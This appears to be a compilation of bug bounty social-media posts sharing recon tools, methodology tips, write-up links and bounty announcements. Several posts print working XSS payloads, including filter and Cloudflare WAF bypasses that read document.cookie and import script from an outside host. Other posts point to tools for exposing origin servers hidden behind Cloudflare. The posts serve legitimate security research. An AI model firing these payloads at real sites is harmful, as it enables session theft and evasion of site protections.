After 2 days of struggling, Bypassed a strong XSS filter on one of the private program. [ No '>' was allowed , no Html tags, Character length 35 ] XSS Payload used :- <svg onload="alert(1)" <="" svg="" XSS Payloads #BugBountyTips #BugBounty

You guys always ask me how do I find SQL injections, its just simple. Avoid what everyone does and make your own methodology. Here is mine: 1. I don't normally go if the target is just target.com. I always prefer the target with wide scope. 1/n #BugBounty

I use this tool regularly! It's very simple, it does reverse DNS lookups as fast as possible. It's a great way of discovering domains and subdomains owned by a company when you know their IP address range(s). github.com/hakluke/hakrev…

Don’t know where to look for bugs ?? In Depth Recon Bug Bounty — Part 02 omarora1603.medium.com/dont-know-wher… #bugbounty #bugbountytips #bugbountytip

All the power of PayloadsAllTheThings, without the overhead. This extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier. github.com/synacktiv/HopL…

MY LAB PAYLOADS 📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍📍 XSS PAYLOADS <base href="alert(1)" onfocus="a = /\/([^/]+)$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus></base> <img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>

XSS on any website with missing charset information? 🔥 Attackers may use the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in Sonar Research's recent blog post: sonarsource.com/blog/encoding-… #appsec #security #vulnerability #RedTeam

unfurl is awesome 🚀 Pull bits out of URLs including domains, TLDs, paths, apexes and so much more! Definitely worth checking out. Another great tool from @tomnomnom 😎

Here I document all the possible #bugbounty #Methodologies I found on internet Medium 15 YouTube 38 Github 4 oreobiscuit.gitbook.io/introduction/m…

You can now detect which WAF your target is using with PentestGPT!

New write up medium.com/@mohamed0xmusl… #bugbountytips #BugBounty #bugbountytip

2 cloudflare bypass payloads by Shad0wH3x <img//////src=x oNlY=1 oNerror=alert(document.cookie)(import(/https:\\X55.is/?1=18369/.sour…> '/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is/?1=18369/.sour…>

Naeem Ahmed Sayed 🇧🇩 Deepak bug_vs_me Microsoft Research github.com/SeifElsallamy/…

Tip:- Install extension (findsomething) on Chrome and Firefox sometimes it give you juicy endpoints✅ Explanation in comments ↓ #bugbountytips #bugbountytip #bugbounty #hackerone #bugcrowd #h1

Alhamdulillah! I received a bounty on the 笑い男の傾倒者 platform for identifying a Security Misconfiguration vulnerability! #bugbounty #penetrationtest #yogosha #cybersecurity

I'm happy to say that the DOMLogger++ workshop created for GreHack is now available 😁 I've written it in a way that it can serve as documentation. I hope it helps you understand how to use it properly! Website: domloggerpp-workshop.mizu.re:5173 GitHub: github.com/kevin-mizu/dom…

Hello everyone ♥ a little bit write-up of #bugbountytip #bugbountytips I am going to write here ..... Title: getting unauthorized access on 3rd party's/workspaces & and building your checklist for quickly locating bugs there via massive recon we know that its helpful to look

Have you tried the XnlReveal browser extension? github.com/xnl-h4ck3r/Xnl… #BugBounty 🤘

ust responsibly hacked into GEA 🎯 Found a Stored XSS → Account Takeover vuln. They patched it, added me to the Hall of Fame 🏆, and sent some awesome swag 👀🔥 #BugBounty #XSS #InfoSec #HackerLife #ResponsibleDisclosure

Cloudflare hides 19.3% of all websites—but not perfectly. CloudRip scans subdomains to find IPs not behind Cloudflare protection, exposing the real origin server: hackers-arise.com/web-app-hackin… OccupytheWeb